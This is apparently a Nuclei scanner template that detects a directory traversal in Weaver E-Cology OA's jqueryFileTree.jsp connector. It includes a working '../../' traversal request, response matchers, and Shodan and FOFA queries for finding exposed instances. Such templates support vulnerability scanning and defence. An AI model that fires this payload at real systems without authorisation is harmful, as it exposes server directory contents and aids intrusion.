id: ecology-jqueryfiletree-traversal info: name: Weaver E-Cology JqueryFileTree - Directory Traversal author: SleepingBag945 severity: medium description: | Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 metadata: verified: true max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" tags: weaver,ecology,traversal,lfr http: - method: GET path: - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../" matchers-condition: and matchers: - type: word words: - "'index.jsp','" - "重命名" - "新建目录" condition: and - type: status status: - 200